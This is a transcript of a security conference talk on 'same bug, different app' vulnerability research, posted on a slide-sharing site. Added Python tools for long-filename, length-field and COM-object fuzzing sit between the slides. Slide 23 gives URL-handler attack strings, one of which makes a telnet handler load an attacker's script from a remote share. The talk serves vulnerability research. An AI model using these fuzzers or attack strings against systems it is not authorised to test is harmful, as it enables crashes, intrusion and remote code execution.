Insomnia Security PowerPoint Presentation

Uploaded to SlidesFinder by onlinesearch (Health & Wellness category); free to download.

Presentation Transcript

Slide 1 - SBDA “same bug, different app” Presented By Brett Moore
Slide 2 - Same Bug, Different App
- The theory that an attack vector affecting one application may also affect another
- An Exploit Is Made Up Of Parts
  - Payload - code to give the desired exploit result
  - Vector - method used to transfer data to the target
  - Target - the target application
- So What Does That Mean
  - Modification of the Target variable can lead to rapid discovery of vulnerabilities exploited through the same Vector
- SBDA – An Introduction (diagram: PAYLOAD = SHELLCODE, VECTOR = CHUNKED POST, TARGET = ASP.DLL)
Slide 3 - SBDA – What It’s Not
- Not The Same Source Code Error
  - We are not talking about the same bug caused by the same problem in the source code
- Not Just Buffer Overflows
  - SBDA is a theoretical concept that affects all types of vulnerabilities
- Not Just Running The Same Exploit
  - SBDA is the use of a known attack vector, not the payload
- It’s Not Law
  - The SBDA concept and theory stemmed from my annoyance at the use of the same attack vector time and time again. It is my view on the topic, and may be completely misguided
Slide 4 - Some Historic SBDA Vulnerabilities
- Long Web Server Filename
  - /[buffer].htr
  - /[buffer].jsp
  - /[buffer].cfm
- Long Web Server Parameter Name
  - /null.ida?[buffer]=x
  - /foo.htr?[buffer]=x
- Long Web Server Header Value
  - Content-Type: [buffer]
  - Host: [buffer]
- Chunked Encoding
  - IIS -> foo.asp and foo.htr
  - Apache servers
  - iPlanet servers
- SBDA Across Multiple Unrelated Platforms
Slide 5 - SBDA – The Conception
- I Wanted To Find A Remote Vulnerability
  - And it was going to affect IIS
- Six Months Of My Life
  - Fuzzing, debugging, disassembling
  - Turned up zilch, zip, nada, nothing
- Take A Step Back
  - As is usual, the answer comes when you stop thinking of the question
- The Methodical Approach To Finding Buffer Overflows
  - The theory was to use existing known attack vectors to methodically test IIS components
Slide 6 - The Original Spreadsheet
- (spreadsheet of Attack Vectors against Targets; the table itself is not reproduced in the transcript)
- 3 Remote Vulnerabilities In A Matter Of Hours (MS03-019, MS03-022, MS03-051)
Slide 7 - How Can This Be Applied To Research
- As Researchers, What Should We Watch For
  - Since we have already tested all known Vectors against all known Targets, we need to watch for:
    - New attack vectors
    - New common targets
- Is It Possible To Predict Future Vulnerabilities
  - Yes! Things are changing: bugs are now fixed before products are shipped, or are found internally and fixed silently
  - Still... history has taught us some valuable lessons
  - Spot the target that hasn’t had vulnerabilities publicised for most attack vectors. One will likely be coming
Slide 8 - Researchers In The Wild
- Randomly Fuzz And Test `stuff`
  - Hoping to strike it rich in the gold rush, and they may
  - No clear direction on targets or vectors
- Semi Targeted Research
  - Once a vulnerability becomes public knowledge, attention is drawn to the vulnerable component
  - The nsiislog.dll first release is a great example
- Targeted Research
  - Researcher attempts to find a vulnerability in one target
  - The spreadsheet may be fully marked, but they may find a repeat
- Methodical Approach
  - Will try all attack vectors against all targets, disregarding knowns
  - Should eventually find all SBDA vulnerabilities
Slide 9 - The SBDA Advantage
- Gives Researchers A Target
  - Through mapping out vectors and targets, it allows researchers to easily spot the gaps
- Gives Researchers Vector Understanding
  - The structured knowledge of different vectors allows researchers to spot vulnerable situations
- Can Make It Easier To Find Vulnerabilities
  - No ‘Groundhog Day’ syndrome
  - Easily track and map progress
- History Shows SBDA Works
  - Following the methodical approach would have led to the discovery of all the historic SBDA vulnerabilities
  - Most likely on the day the first vulnerability for each vector was released
Slide 10 - Some Recent SBDA Trends
- Firefox Host Buffer Overflow
  - Affects Netscape browser
- Archive Contains Long Filename
  - Affects multiple unarchive programs
  - Affects multiple virus scanning programs
- Process Explorer CompanyName Buffer Overflow
  - KillProcess 2.20 and prior: FileDescription local buffer overflow
- JView Profiler
  - Multiple other CLSIDs
- RPC Vulnerabilities
  - Find an API that takes a host and a string
  - Capture the packet, manipulate the string and values
- The Reality Is...
  - Any vulnerability based on a known attack vector is a SBDA
  - The only difference is the target
Slide 11 - The AV / Archive SBDA (in reverse)
- Secunia
  - HAURI Anti-Virus Compressed Archive Directory
  - HAURI Anti-Virus ACE Archive Handling Buffer Overflow
  - ALZip ACE Archive Handling Buffer Overflow
  - NOD32 Anti-Virus ARJ Archive Handling Buffer Overflow
  - AVIRA Antivirus ACE Archive Handling Buffer Overflow
  - Ahnlab V3 Antivirus Multiple Vulnerabilities
  - PowerArchiver ACE/ARJ Archive Handling Buffer Overflow
  - 7-Zip ARJ Archive Handling Buffer Overflow
- iDefense
  - Sophos Anti-Virus Zip File Handling DoS Vulnerability
  - Clam AntiVirus ClamAV Cabinet File Handling DoS Vulnerability
  - Clam AntiVirus ClamAV MS-Expand File Handling DoS Vulnerability
- ISS
  - Symantec UPX PE heap overflow
  - McAfee malformed LHA archive
  - TrendMicro long filename in ARJ header
  - F-Secure long filename in ARJ header
Slide 12 - Methodical vs Random?
- Can A Structured Testing Routine Pay Out With Findings?
  - Yes, as is proved on a regular basis
- Can A Random Testing Process Pay Out With Findings?
  - Yes, with luck, as is proved on a regular basis; but it could take considerably longer in time and amount of effort
- Are There Benefits To Using Both?
  - Absolutely!! If you view the methodical approach as thinking within the square, then random is thinking outside the square
  - Thinking outside the square is what leads to new vectors that can then be placed into the spreadsheet
  - Thinking outside the square is where the interesting stuff is
Slide 13 - Packet vs File
- Both Are Data
  - Both a packet and a file are methods of getting data to a target
- File Data Is Still User Supplied Input
  - This appears to be a common mistake: “Why would somebody open a corrupt file?”
- File Exploits Can Bypass Corporate Firewalls
  - Vulnerabilities exploited through files that open automatically are especially dangerous
- File Based Vulnerabilities Are Easier To Detect?
  - Easier to automate the examination of files
  - Possible to capture network traffic and examine packet dumps for strings that could be manipulated
Slide 14 - Some Common Vector Tests
- Long Filename / Path Name
  - Anywhere a filename is used should be tested with a long filename or path
- Long Parameter
  - Any parameters or parameter names should be checked
- Large Post / Chunked Encoding
  - Sending of a large amount of data
- String Manipulation
  - Any obvious text strings should be tested
- Length Value Manipulation
  - Any obvious user supplied values should be tested
Slide 15 - Some Common Test Methods
- Fuzzing
  - Create packets/files with injected arbitrary data
- Manual Inspection
  - Inspecting packets/files for vector avenues
  - Reviewing RFCs and packet formats for vector avenues
- Reverse Engineering
  - Debuggers and disassemblers
- Automated Analysis
  - Search files for [length][string] pairs
- Vector Automation
  - Attempt some or all vectors against a target
- Target Automation
  - Attempt one vector against multiple targets
Slide 16 - Recognising A Vulnerability
- Debuggers
  - Always have a debugger running
  - Best to have a debugger attached to the target process
- Exceptions
  - Not all exploitable exceptions are unhandled
- Event Log
  - Checking the event log can sometimes show crashes
- Be Alert
  - Spot differences in replies or target behaviour
- Disregard Standard Error Messages
  - Go above and beyond the limits
- Vulnerability Example
  - Enough talk... let’s break something
Slide 17 - SBDA Theory In Practice
- Some Examples From Experience
  - On the following few slides are examples of some SBDA vulnerabilities that I have discovered
- SBDA: Same bug, different app...
  - Nothing new about these bugs
- Take Note Though
  - The information in the following slides should point you in the right direction to find your own
Slide 18 - The Long Filename SBDA
- Oct 12, 2004: Group Converter Buffer Overflow Vulnerability
  - [buffer].grp – buffer overflow in program group converter
- Still... After All This Time
  - Why have these vulnerabilities not all been discovered?
- FileNameSizer Tool
  - Creates files with a filename of the maximum allowed length and all extensions from aaa through to zzz
  - [250*x].aaa, [250*x].aab, ..., [250*x].zzy, [250*x].zzz
  - Loads all files in the default application
- The Windows 2000 Findings
  - [buffer].cda - buffer overflow in Winamp
  - [buffer].cap - buffer overflow in MS Network Monitor
  - [buffer].nms - buffer overflow in NuMega Symbol Loader
  - [buffer].nrg - buffer overflow in Nero CD Burner
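The FileNameSizer idea on this slide, written out as an added Python example (it is not Brett Moore's tool, and the presentation does not show its source): generate one file per three-letter extension with the stem padded so the full path sits on the Windows MAX_PATH limit, then hand each file to its registered default application. The MAX_PATH value of 260, the choice of "A" as filler, and the directory names are assumptions; pass a larger `limit` to go "above and beyond" it for handlers that have their own smaller buffers.

```python
"""Added example (not Brett Moore's FileNameSizer): build maximal-length
filenames for every three-letter extension so each file type's default
handler is exercised with the long-filename vector."""
import itertools
import os
import string

# Windows MAX_PATH is 260 characters including the terminating NUL, so a
# full path for a non-long-path-aware application is at most 259 characters.
# Assumption: that is the limit we want to sit exactly on; pass a larger
# `limit` to go past it for handlers that have their own smaller buffers.
MAX_PATH = 260


def max_stem_length(directory: str, ext: str, limit: int = MAX_PATH) -> int:
    """Stem length such that <directory>/<stem>.<ext> is exactly limit-1 chars."""
    overhead = len(os.path.join(directory, "")) + 1 + len(ext)   # dir + sep, '.', ext
    stem = limit - 1 - overhead
    if stem <= 0:
        raise ValueError("directory path leaves no room for a filename")
    return stem


def long_filenames(directory: str, fill: str = "A", ext_len: int = 3,
                   alphabet: str = string.ascii_lowercase, limit: int = MAX_PATH):
    """Yield AAA...A.aaa, AAA...A.aab, ..., AAA...A.zzz, each stem as long as
    `limit` allows once `directory` is prepended."""
    for letters in itertools.product(alphabet, repeat=ext_len):
        ext = "".join(letters)
        yield fill * max_stem_length(directory, ext, limit) + "." + ext


def write_files(directory: str, content: bytes = b"SBDA\r\n", **kw) -> list:
    """Create every file; the body is irrelevant, the name is the payload."""
    os.makedirs(directory, exist_ok=True)
    paths = []
    for name in long_filenames(directory, **kw):
        path = os.path.join(directory, name)
        with open(path, "wb") as f:
            f.write(content)
        paths.append(path)
    return paths


def open_in_default_app(path: str) -> None:
    """Hand the file to whatever is registered for its extension, i.e. the
    'target' column of the spreadsheet. Windows only (os.startfile); run it
    with a JIT or attached debugger so the crash is caught, one file at a time."""
    if not hasattr(os, "startfile"):
        raise RuntimeError("default-application launch is Windows only")
    os.startfile(path)


if __name__ == "__main__":
    import sys
    out = sys.argv[1] if len(sys.argv) > 1 else os.path.join(os.getcwd(), "fnsizer")
    created = write_files(out)
    print(f"wrote {len(created)} files under {out}; open them with open_in_default_app()")
```

Extensions that have no registered handler simply open the "Open With" dialog and can be skipped; the interesting ones are those whose handler copies the path into a fixed buffer before (or instead of) checking its length.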
Slide 19 - The Long Value SBDA
- Length Values Used In Allocation Or Copying
  - Graphic size parameters
  - Size of data blocks
  - Size of text string
- Common Mistakes
  - Buffer is allocated the size of length, text is copied till null
  - Buffer is allocated based on length, text is copied length bytes
  - Buffer is preallocated, text is copied length bytes
- FileLengther Tool
  - Searches files for text strings that have a corresponding length in the byte/word beforehand: [length][text string]
- Some Findings
  - .xls - Excel 2000 (MS04-033)
  - .chm - HTML Help (MS04-023)
Slide 20 - Fuzzing Files
- Automated File Fuzzing Tools
  - Extend an existing text string
  - Insert a long text string
  - Modify each byte/word/dword to an arbitrary value
  - Load file in default application
- Masses Of Application Crashes
  - Next step is to determine the cause and whether the situation is exploitable
  - It is this step that takes the longest
- Fuzzy Example
  - Use a standard .chm as the master
  - Show the [length][text string] pairs
  - Let’s fuzz it..
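The [length][text string] search of slide 19 and the string-extension fuzzing of slide 20, as one added Python example (a reimplementation of the idea, not FileLengther or the fuzzer used in the talk). The scanner looks for a 1-byte or 2-byte little-endian length field immediately followed by exactly that many printable bytes; the mutator then emits the variants that correspond to the three "common mistakes" on slide 19: a length far larger than the data present, a length of zero in front of text that runs on to a NUL, and a long string with either a stale or an updated length field. The sample bytes are constructed for the example and are not a real file format; the field widths, endianness and the 1024-byte growth are assumptions to tune per target.

```python
"""Added example (not Brett Moore's FileLengther or fuzzer): locate
[length][text string] pairs in a binary file and emit the length-mismatch
and long-string variants that slides 19 and 20 describe."""
import os
import struct

PRINTABLE = frozenset(range(0x20, 0x7F))   # ASCII text a parser will display/copy
MODES = ("length_max", "length_zero", "grow_unsynced", "grow_synced")


def find_length_prefixed_strings(data: bytes, min_len: int = 4):
    """Return (offset, width, length) for every spot where a 1-byte or a
    2-byte little-endian length field is immediately followed by exactly
    that many printable bytes. The widths/endianness are assumptions."""
    hits = []
    for off in range(len(data)):
        for width, fmt in ((1, "<B"), (2, "<H")):
            if off + width > len(data):
                continue
            n = struct.unpack_from(fmt, data, off)[0]
            start, end = off + width, off + width + n
            if n < min_len or end > len(data):
                continue
            if all(b in PRINTABLE for b in data[start:end]):
                hits.append((off, width, n))
    return hits


def mutate(data: bytes, hit, mode: str, fill: bytes = b"A", grow_to: int = 1024) -> bytes:
    """One variant per 'common mistake' on slide 19:
    length_max    - length says far more than is present: a copy of `length`
                    bytes into a preallocated or length-sized buffer overruns
    length_zero   - length says 0 but text runs on to the NUL: allocate
                    `length`, copy till NUL -> heap overflow
    grow_unsynced - long text with the stale, small length field
    grow_synced   - long text with the length field updated to match"""
    off, width, n = hit
    fmt = "<B" if width == 1 else "<H"
    field_max = (1 << (8 * width)) - 1
    start, end = off + width, off + width + n
    if mode == "length_max":
        return data[:off] + struct.pack(fmt, field_max) + data[start:]
    if mode == "length_zero":
        return data[:off] + struct.pack(fmt, 0) + data[start:]
    if mode == "grow_unsynced":
        return data[:start] + fill * grow_to + data[end:]
    if mode == "grow_synced":
        new_len = min(grow_to, field_max)
        return data[:off] + struct.pack(fmt, new_len) + fill * new_len + data[end:]
    raise ValueError(f"unknown mode {mode!r}")


def generate_cases(data: bytes):
    """Yield (hit, mode, mutated_bytes) for every pair and every mode."""
    for hit in find_length_prefixed_strings(data):
        for mode in MODES:
            yield hit, mode, mutate(data, hit, mode)


def write_cases(master_path: str, out_dir: str) -> list:
    """Write each variant with the master's extension so the default
    application (os.startfile on Windows) opens it under a debugger."""
    with open(master_path, "rb") as f:
        data = f.read()
    os.makedirs(out_dir, exist_ok=True)
    stem, ext = os.path.splitext(os.path.basename(master_path))
    written = []
    for (off, width, n), mode, blob in generate_cases(data):
        path = os.path.join(out_dir, f"{stem}_{off:08x}_{width}_{mode}{ext}")
        with open(path, "wb") as f:
            f.write(blob)
        written.append(path)
    return written


# Constructed sample, not a real format: a 1-byte [length][text] pair
# followed by a 2-byte little-endian one, each NUL-terminated.
SAMPLE = (b"HDR\x00"
          + b"\x0b" + b"Hello World" + b"\x00"
          + b"\x07\x00" + b"Exploit" + b"\x00")

if __name__ == "__main__":
    for (off, width, n), mode, blob in generate_cases(SAMPLE):
        print(f"offset 0x{off:x} width {width} len {n:<4} {mode:<14} -> {len(blob)} bytes")
```

Run `write_cases("master.chm", "out")` against a known-good file and open the results one at a time with a debugger attached, as slide 16 advises; the filename encodes which pair and which mode produced a crash, which is what makes the "determine the cause" step on slide 20 tractable.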
Slide 21 - The Long Import SBDA
- Jan 2005: IDA Pro Import Library Buffer Overflow
  - A long import name in the PE header
- Researchers Targeted Debuggers And Disassemblers
  - IDA Pro – format string
  - OllyDbg – long process module
  - OllyDbg – format string
  - PVDasm – long file name
  - W32Dasm – long import library name
- Chart The Vector And The Targets
  - Craft some files based on known attack vectors
  - Try to view / analyse the files with all known debuggers and PE analysis tools
  - Findings?
Slide 22 - The Long Text SBDA
- The Most Common Type Of Overflow
  - History has shown that a huge number of vulnerabilities are caused by the unsafe copy of long text strings
- Easiest Way To Find A Vulnerability
  - Find a file / packet with a text string
  - Change it to a very large string
- Some Findings
  - .cbo (MS05-031)
  - .sln
  - .ht (MS04-043)
  - .job (MS04-022)
- Example .cbo (Microsoft Interactive Training) file:
    [Microsoft Interactive Training]
    User=[buffer]
    SerialID=00000000
- Example .sln file:
    Microsoft Visual Studio Solution File, Format Version 1.00
    Project("{BDD4A1A1-7A1F-11D0-AC13-00A0C91E29D5}") = "[buffer]", "Exploiter", "{4EEF2406-B103-4F8B-A13F-381BDA14205F}"
    EndProject
Slide 23 - The URL Handler SBDA
- Mar 09, 2004: Pass Commands Through mailto:
  - Run script in the context of MS Outlook
- May 12, 2004: Pass Commands Through telnet:
  - Specify a telnet log file to write the session to
- Jun 27, 2004: Pass Commands Through notes:
  - Specify a configuration file, leads to attacker’s .dll loading
- Search Registry For Handlers
  - Search for "URL Protocol" entries
  - Check which command line switches exist
- Findings?
  - HyperTerminal - specify session file (corrupt .ht buffer overflow)
    telnet://#\\10.10.10.2\test\exploit.ht
  - SecureCRT - specify a config file (run attacker VBScript)
    telnet://IP:80 # /f \\attacker\share\configfolder
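The "search registry for handlers" step on this slide, as an added Python example that is not part of the presentation: parse a `.reg` export of HKEY_CLASSES_ROOT, pick out every scheme key that carries a "URL Protocol" value, and report the `shell\open\command` it runs together with the executable to interrogate for switches (`exe /?`) and whether the URL placeholder (`%1` or `%l`) is quoted. An unquoted placeholder is the precondition for the SecureCRT finding above: a URL containing spaces is split into extra arguments for the handler. The registry text below is constructed for the example (the program paths are invented), and the `live_url_handlers` helper only works on Windows.

```python
"""Added example (not from the presentation): enumerate URL protocol
handlers from a .reg export and flag commands whose URL placeholder is
unquoted, the condition that lets a crafted URL add command-line switches."""
import re

_KEY = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s: str) -> str:
    """Undo .reg string escaping: \\\\ -> \\ and \\" -> "."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> dict:
    """Minimal parser for 'Windows Registry Editor Version 5.00' exports:
    {key_path: {value_name: data}}. '@' is the default value; only string
    data is unescaped, other types (dword:, hex:) are kept verbatim."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY.match(line)
        if m:
            current = m.group(1)
            reg.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m and current is not None:
            name, data = m.groups()
            name = "@" if name == "@" else _unescape(name[1:-1])
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            reg[current][name] = data
    return reg


def url_handlers(reg: dict) -> list:
    """Every HKCR\\<scheme> key carrying a 'URL Protocol' value, with the
    shell\\open\\command it runs and whether %1/%l is quoted."""
    found = []
    for key, values in reg.items():
        parts = key.split("\\")
        if len(parts) != 2 or parts[0].upper() != "HKEY_CLASSES_ROOT":
            continue
        if "URL Protocol" not in values:
            continue
        cmd = reg.get(key + r"\shell\open\command", {}).get("@", "")
        if cmd.startswith('"') and cmd.count('"') >= 2:
            exe = cmd[1:cmd.index('"', 1)]
        else:
            exe = cmd.split(" ", 1)[0]
        placeholder = re.search(r'"?%[1lL]"?', cmd)
        found.append({
            "protocol": parts[1],
            "command": cmd,
            "exe": exe,                      # run `exe /?` to list its switches
            "has_placeholder": placeholder is not None,
            "arg_quoted": bool(placeholder) and placeholder.group(0).startswith('"'),
        })
    return sorted(found, key=lambda h: h["protocol"].lower())


def live_url_handlers() -> list:
    """Windows only: read HKCR directly instead of from an export."""
    import winreg  # ImportError on other platforms
    root, reg, i = winreg.HKEY_CLASSES_ROOT, {}, 0
    while True:
        try:
            name = winreg.EnumKey(root, i)
        except OSError:
            break
        i += 1
        try:
            with winreg.OpenKey(root, name) as k:
                winreg.QueryValueEx(k, "URL Protocol")
            cmd = winreg.QueryValue(root, name + r"\shell\open\command")
        except OSError:
            continue
        reg["HKEY_CLASSES_ROOT\\" + name] = {"URL Protocol": ""}
        reg["HKEY_CLASSES_ROOT\\" + name + r"\shell\open\command"] = {"@": cmd}
    return url_handlers(reg)


# Constructed .reg export for the example; the handler paths are invented.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\telnet]
@="URL:Telnet Protocol"
"URL Protocol"=""
"EditFlags"=dword:00000002

[HKEY_CLASSES_ROOT\telnet\shell\open\command]
@="\"C:\\Program Files\\Example\\termapp.exe\" %l"

[HKEY_CLASSES_ROOT\notes]
@="URL:Notes Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\notes\shell\open\command]
@="C:\\notes\\notes.exe \"%1\""

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
'''

if __name__ == "__main__":
    for h in url_handlers(parse_reg_export(SAMPLE_REG)):
        flag = "OK " if h["arg_quoted"] else "!! "
        print(f'{flag}{h["protocol"]:<8} {h["command"]}')
```

Whether the launching application passes spaces through unencoded varies by browser and mail client, so treat an unquoted placeholder as a lead to confirm with a real link, not as a finding on its own; the handler's own switch list (the `exe` field) tells you what an injected argument could make it do.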
Slide 24 - The Webview SBDA
- May 10, 2005: Vulnerability In Web View
  - When Explorer is set to webview, it displays the author of an Office document
  - Any scripting in the author field will execute in the Explorer context
- No Methodical Approach This Time
  - While investigating .job vulnerabilities I noticed that the creator field is displayed by Explorer webview
- Recognise The Attack Vector
  - Let’s see what happens if we place scripting code into the creator field, and direct a user to the Tasks folder?
Slide 25 - The CLSID SBDA
- June/July 2005: javaprxy.dll Instantiation
  - Perfect candidate for SBDA
  - A new vector – unexpected COM object instantiation
  - New targets – IE through multiple COM objects
- As We Expected
  - Exploits through other objects were discovered
  - Another patch to fix multiple objects, or the root cause?
- But Still?
    #:>reg query HKEY_CLASSES_ROOT\CLSID > exploit.htm
  - Some basic search and replace
  - Load into IE..... and wait
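The "basic search and replace" on this slide, as an added Python example (not code from the presentation): pull every CLSID out of `reg query HKEY_CLASSES_ROOT\CLSID` output and emit `<object classid="clsid:...">` pages. The one refinement over a single page is batching: one CLSID per page (or a small batch) means the page that crashes names the object that crashed, which the single-page approach cannot tell you. The `reg query` text below is constructed with placeholder GUIDs, not real CLSIDs, and `query_clsids` only runs on Windows.

```python
"""Added example (not from the presentation): turn `reg query
HKEY_CLASSES_ROOT\\CLSID` output into COM instantiation test pages, one
CLSID (or a small batch) per page so a crash can be tied to its object."""
import html
import os
import re
import subprocess

_CLSID = re.compile(
    r"HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})")


def clsids_from_reg_query(text: str) -> list:
    """Unique CLSIDs in first-seen order from `reg query` output; subkeys
    such as InprocServer32 collapse onto their parent CLSID."""
    return list(dict.fromkeys(m.group(1).upper() for m in _CLSID.finditer(text)))


def query_clsids() -> list:
    """Windows only: run the command from the slide and parse its output."""
    out = subprocess.run(["reg", "query", r"HKEY_CLASSES_ROOT\CLSID"],
                         capture_output=True, text=True, check=True).stdout
    return clsids_from_reg_query(out)


def build_page(clsids) -> str:
    """One <object> per CLSID; the title lists them so the crashing page is
    identifiable from the debugger or the browser window list."""
    objs = "\n".join(f'<object classid="clsid:{c}" id="obj{i}"></object>'
                     for i, c in enumerate(clsids))
    return ("<html><head><title>" + html.escape(" ".join(clsids)) + "</title></head>\n"
            "<body>\n" + objs + "\n</body></html>\n")


def build_pages(clsids, per_page: int = 1) -> list:
    """Split into (filename, html) batches; per_page=1 is slowest but
    unambiguous, larger batches trade that certainty for speed."""
    pages = []
    for i in range(0, len(clsids), per_page):
        batch = clsids[i:i + per_page]
        pages.append((f"clsid_{i // per_page:05d}.htm", build_page(batch)))
    return pages


def write_pages(out_dir: str, clsids, per_page: int = 1) -> list:
    os.makedirs(out_dir, exist_ok=True)
    paths = []
    for name, page in build_pages(clsids, per_page):
        path = os.path.join(out_dir, name)
        with open(path, "w", encoding="utf-8") as f:
            f.write(page)
        paths.append(path)
    return paths


# Constructed `reg query` output with placeholder GUIDs (not real CLSIDs).
SAMPLE_REG_QUERY = r"""
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}
HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000002}
HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000002}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000003}
"""

if __name__ == "__main__":
    ids = clsids_from_reg_query(SAMPLE_REG_QUERY)
    for name, page in build_pages(ids, per_page=2):
        print(f"--- {name}\n{page}")
```

Load the pages in the browser with a debugger attached (slide 16) and note which CLSIDs never reach a crash because they are not safe for scripting or have been kill-bitted (the Compatibility Flags value under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`); those are the root-cause fix the slide asks about, as opposed to patching objects one at a time.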
Slide 26 - SBDA To The Test
- Quick File Based Vulnerability Demonstration
  - Do we have time?
Slide 27 - Weaknesses With Common Tests
- Fuzzing
  - Intelligent fuzzing is still just fuzzing
  - Make sure you have the request correct first!!
- Target Automation
  - Can only test applications and versions that are installed
- Exception Handling
  - Some exceptions will never get back to you
- String Types And Lengths
  - Application may block certain characters / lengths / patterns
  - Other characters / lengths / patterns may be allowed
- The 2nd Generation Vulnerability
  - Complex vulnerabilities may be missed
Slide 28 - 2nd Generation Vulnerabilities
- More Than Just The Norm
  - May require a sequence of initial packets
  - May require bad data in more than one place
- Fuzzing These
  - May or may not be possible
  - Advanced fuzzers will need to be created
- Consequences?
  - Vulnerabilities may remain hidden for longer
  - May require binary or source analysis to find the sequence
Slide 29 - Non SBDA Vectors
- These Are The Interesting Ones
  - Some apply only against a specific target
  - Others are new vectors that may become SBDA vectors
- Often Overlooked
  - Because they don’t fit the normal pattern
- Examples
  - DNS server long response
  - Corrupt cookie value, long basic credentials
  - DeviceIoControl, shatter attacks, events, shared sections
  - VDM, expand-down data segments
- Thinking Outside The Square
  - Often the result of new research
  - Going where nobody has gone before
Slide 30 - Wrap Up
- Same Bug, Different App
  - The theory that an attack vector affecting one application may also affect another
- The Majority Of Vulnerabilities Are SBDA
  - Usually caused by a long string, or an invalid size value
- A Large Number Can Be Found Easily
  - By using common attack vectors, automated tools can discover a large number of SBDA vulnerabilities
- Remember It’s Platform Independent
  - Attack vectors against Windows may work against *nix
  - More file based testing should be done against other platforms
- Tomorrow’s Another Day
  - And another vulnerability
Slide 31 - Questions?
- http://www.security-assessment.com
- brett.moore@security-assessment.com